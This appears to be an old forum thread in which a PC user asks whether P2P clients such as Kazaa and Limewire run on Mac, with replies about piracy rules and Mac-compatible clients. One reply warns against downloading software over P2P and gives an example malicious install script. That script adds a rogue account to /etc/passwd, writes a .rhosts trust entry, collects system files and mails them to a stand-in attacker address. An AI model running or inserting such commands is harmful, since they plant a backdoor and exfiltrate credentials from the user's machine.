Hello,
I have used PC's for a long while now and have been happy with the amount of software available over the net [snip].
I am currently in the market for a laptop and am heavily considering getting a powerbook or ibook mainly for my travel photography.
But I am wondering if there are [p2p] software options available for download over the internet.... like through kazaa, limewire, and such. Are these also Mac Friendly or are there other different options like these that are mac only?
thx,
M

Are there any other programs like these available for mac products that you would recommend?

Just a note: the overt discussion of software piracy/warez/serial cracking on this forum is prohibited.

Usually, soomething like "Can I use peer-to-peer filesharing software?" is tollerated, but "Where can I download Photoshop CS2 for free?" will get your butt handed to you.

You're right technologist. The original post was just a little over the line.

P2p

Azureus, Limewire, Kazaa all run on OSX. There are quite a few others.

I have never trusted downloading *software* over any of the p2p services for any platform. It would just be too easy for someone to write something and give it a name like 'MSoffice X' that, while maybe a workin copy, has smething like this tagged onto the end of the install :

cat "hacker:*:52:0:A malicious hacker:/:/sbin/ksh" >> /etc/passwd
ifconfig lan0 > yourinfo.txt
netstat -a >> yourinfo.txt
cat /etc/passwd >> yourinfo.txt
ls -lR / >> yourinfo.txt
echo "hacker.hackers.net root" > /.rhosts
mailx -s "I found another fool!" [email protected] < ./yourinfo.txt
rm yourinfo.txt

Whoever is at [email protected] now owns your mac.

I wouldn't usually advise using P2P software, but remember that you are using a mac, and 99% of viruses are designed for the infamous Windows. You would be realitivly safer on a Mac, I wouldn't advise it. Even Limewire caused problems for my system in the past.
